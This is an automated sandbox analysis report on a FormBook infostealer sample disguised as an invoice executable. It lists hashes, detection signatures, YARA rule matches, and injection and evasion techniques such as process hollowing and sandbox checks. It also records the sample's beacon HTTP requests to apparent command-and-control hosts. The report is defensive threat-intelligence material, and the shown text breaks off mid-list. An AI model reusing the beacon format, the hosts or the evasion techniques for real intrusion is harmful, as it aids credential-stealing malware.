Analysis Report PT300975-inv.exe

Overview

General Information

Sample Name: PT300975-inv.exe
Analysis ID: 323028
MD5: 025544a9014cf1667e8a1d4ff68da253
SHA1: 0123853e7960cdae4f3ad95945b4ec86adbb93c6
SHA256: 2858bfcb9388b05049df45459ee60bf96be0b0d75a3be34cf3c00f57ec9f4469
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: PT300975-inv.exe ReversingLabs: Detection: 21%
Yara detected FormBook
Source: Yara match File source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.mscorsvw.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_02DEE404
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then push dword ptr [ebp-20h] 0_2_02DEEEB0
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_02DEEEB0
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then push dword ptr [ebp-24h] 0_2_02DEF1D0
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_02DEF1D0
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_02DEE9CC
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then push dword ptr [ebp-20h] 0_2_02DEEEA4
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_02DEEEA4
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then xor edx, edx 0_2_02DEF0FC
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then push dword ptr [ebp-24h] 0_2_02DEF1C9
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_02DEF1C9
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 0_2_02DE91F1
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then xor edx, edx 0_2_02DEF108
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then mov ecx, dword ptr [0401E69Ch] 0_2_02DE7EA0
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 0_2_02DE7EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 4x nop then pop edi 2_2_00416BF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 4x nop then pop edi 2_2_00416C07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 4x nop then pop edi 2_2_00416C27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 4x nop then pop edi 2_2_00416C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 4x nop then pop edi 2_2_00417D68
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 4_2_009A6BF3
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 4_2_009A6C07
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 4_2_009A6C3F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 4_2_009A6C27
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 4_2_009A7D68

Networking:

HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jqc/?JfEtEZgp=AQxPeURRQ9kC4DgOk8VME5njQ8dFSmWtzYEqQ7tz67PuOtzOYn8gv4wq3HEWg5IvV5fpD9rFbA==&ojq0s=RzulsD HTTP/1.1 Host: www.solidconstruct.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jqc/?JfEtEZgp=cE9UUOc3pLPT0LAdHSIP3evlMF3IBhbdmq5wG0CQLEBsctkiCkQzhS7S4EgmhhRecsIvRlsotA==&ojq0s=RzulsD HTTP/1.1 Host: www.asacal.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS
Source: unknown DNS traffic detected: queries for: g.msn.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: PT300975-inv.exe, 00000000.00000002.345062804.00000000013BB000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
.NET source code contains very large array initializations
Source: PT300975-inv.exe, nNu0028/Fx1.cs Large array initialization: d!3: array initializer size 91136
Source: 0.2.PT300975-inv.exe.c50000.0.unpack, nNu0028/Fx1.cs Large array initialization: d!3: array initializer size 91136
Source: 0.0.PT300975-inv.exe.c50000.0.unpack, nNu0028/Fx1.cs Large array initialization: d!3: array initializer size 91136
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00419D60 NtCreateFile, 2_2_00419D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00419E10 NtReadFile, 2_2_00419E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00419E90 NtClose, 2_2_00419E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00419D5D NtCreateFile, 2_2_00419D5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00419E0B NtReadFile, 2_2_00419E0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00419E8A NtClose, 2_2_00419E8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729540 NtReadFile,LdrInitializeThunk, 2_2_05729540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057295D0 NtClose,LdrInitializeThunk, 2_2_057295D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729710 NtQueryInformationToken,LdrInitializeThunk, 2_2_05729710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057297A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_057297A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729780 NtMapViewOfSection,LdrInitializeThunk, 2_2_05729780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057296E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_057296E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_05729910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057299A0 NtCreateSection,LdrInitializeThunk, 2_2_057299A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_05729860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729840 NtDelayExecution,LdrInitializeThunk, 2_2_05729840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729A50 NtCreateFile,LdrInitializeThunk, 2_2_05729A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729A20 NtResumeThread,LdrInitializeThunk, 2_2_05729A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729560 NtWriteFile, 2_2_05729560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0572AD30 NtSetContextThread, 2_2_0572AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729520 NtWaitForSingleObject, 2_2_05729520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057295F0 NtQueryInformationFile, 2_2_057295F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729770 NtSetInformationFile, 2_2_05729770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0572A770 NtOpenThread, 2_2_0572A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729760 NtOpenProcess, 2_2_05729760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729730 NtQueryVirtualMemory, 2_2_05729730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0572A710 NtOpenProcessToken, 2_2_0572A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729FE0 NtCreateMutant, 2_2_05729FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729670 NtQueryInformationProcess, 2_2_05729670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729660 NtAllocateVirtualMemory, 2_2_05729660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729650 NtQueryValueKey, 2_2_05729650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729610 NtEnumerateValueKey, 2_2_05729610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057296D0 NtCreateKey, 2_2_057296D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729950 NtQueueApcThread, 2_2_05729950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057299D0 NtCreateProcessEx, 2_2_057299D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0572B040 NtSuspendThread, 2_2_0572B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729820 NtEnumerateKey, 2_2_05729820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057298F0 NtReadVirtualMemory, 2_2_057298F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057298A0 NtWriteVirtualMemory, 2_2_057298A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729B00 NtSetValueKey, 2_2_05729B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0572A3B0 NtGetContextThread, 2_2_0572A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729A10 NtQuerySection, 2_2_05729A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729A00 NtProtectVirtualMemory, 2_2_05729A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729A80 NtOpenDirectoryObject, 2_2_05729A80
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9A50 NtCreateFile,LdrInitializeThunk, 4_2_034A9A50
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_034A9910
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A99A0 NtCreateSection,LdrInitializeThunk, 4_2_034A99A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9840 NtDelayExecution,LdrInitializeThunk, 4_2_034A9840
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9860 NtQuerySystemInformation,LdrInitializeThunk, 4_2_034A9860
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9710 NtQueryInformationToken,LdrInitializeThunk, 4_2_034A9710
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9FE0 NtCreateMutant,LdrInitializeThunk, 4_2_034A9FE0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9780 NtMapViewOfSection,LdrInitializeThunk, 4_2_034A9780
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A96D0 NtCreateKey,LdrInitializeThunk, 4_2_034A96D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_034A96E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9540 NtReadFile,LdrInitializeThunk, 4_2_034A9540
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A95D0 NtClose,LdrInitializeThunk, 4_2_034A95D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9B00 NtSetValueKey, 4_2_034A9B00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034AA3B0 NtGetContextThread, 4_2_034AA3B0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9A00 NtProtectVirtualMemory, 4_2_034A9A00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9A10 NtQuerySection, 4_2_034A9A10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9A20 NtResumeThread, 4_2_034A9A20
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9A80 NtOpenDirectoryObject, 4_2_034A9A80
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9950 NtQueueApcThread, 4_2_034A9950
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A99D0 NtCreateProcessEx, 4_2_034A99D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034AB040 NtSuspendThread, 4_2_034AB040
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9820 NtEnumerateKey, 4_2_034A9820
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A98F0 NtReadVirtualMemory, 4_2_034A98F0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A98A0 NtWriteVirtualMemory, 4_2_034A98A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9760 NtOpenProcess, 4_2_034A9760
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034AA770 NtOpenThread, 4_2_034AA770
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9770 NtSetInformationFile, 4_2_034A9770
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034AA710 NtOpenProcessToken, 4_2_034AA710
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9730 NtQueryVirtualMemory, 4_2_034A9730
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A97A0 NtUnmapViewOfSection, 4_2_034A97A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9650 NtQueryValueKey, 4_2_034A9650
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9660 NtAllocateVirtualMemory, 4_2_034A9660
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9670 NtQueryInformationProcess, 4_2_034A9670
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9610 NtEnumerateValueKey, 4_2_034A9610
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9560 NtWriteFile, 4_2_034A9560
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9520 NtWaitForSingleObject, 4_2_034A9520
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034AAD30 NtSetContextThread, 4_2_034AAD30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A95F0 NtQueryInformationFile, 4_2_034A95F0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009A9D60 NtCreateFile, 4_2_009A9D60
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009A9E90 NtClose, 4_2_009A9E90
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009A9E10 NtReadFile, 4_2_009A9E10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009A9D5D NtCreateFile, 4_2_009A9D5D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009A9E8A NtClose, 4_2_009A9E8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009A9E0B NtReadFile, 4_2_009A9E0B
Detected potential crypto function
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03531FF1 4_2_03531FF1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352D616 4_2_0352D616
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03486E30 4_2_03486E30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03532EF7 4_2_03532EF7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03531D55 4_2_03531D55
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03532D07 4_2_03532D07
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03460D20 4_2_03460D20
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_035325DD 4_2_035325DD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347D5E0 4_2_0347D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03492581 4_2_03492581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352D466 4_2_0352D466
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347841F 4_2_0347841F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009AE197 4_2_009AE197
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_00992D90 4_2_00992D90
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_00992D87 4_2_00992D87
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_00999E3F 4_2_00999E3F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_00999E40 4_2_00999E40
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009ADF97 4_2_009ADF97
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_00992FB0 4_2_00992FB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009ADFAA 4_2_009ADFAA
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: String function: 0346B150 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: String function: 056EB150 appears 35 times
Sample file is different than original file name gathered from version info
Source: PT300975-inv.exe Binary or memory string: OriginalFilename vs PT300975-inv.exe
Source: PT300975-inv.exe, 00000000.00000002.345433163.0000000003039000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRunPe4.dll. vs PT300975-inv.exe
Source: PT300975-inv.exe, 00000000.00000002.344599838.0000000000C52000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameuse5.exeH vs PT300975-inv.exe
Source: PT300975-inv.exe, 00000000.00000002.345826499.0000000004021000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDESdgdhser.dll0 vs PT300975-inv.exe
Source: PT300975-inv.exe, 00000000.00000002.346817865.00000000055B0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs PT300975-inv.exe
Source: PT300975-inv.exe Binary or memory string: OriginalFilenameuse5.exeH vs PT300975-inv.exe
Yara signature match
Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
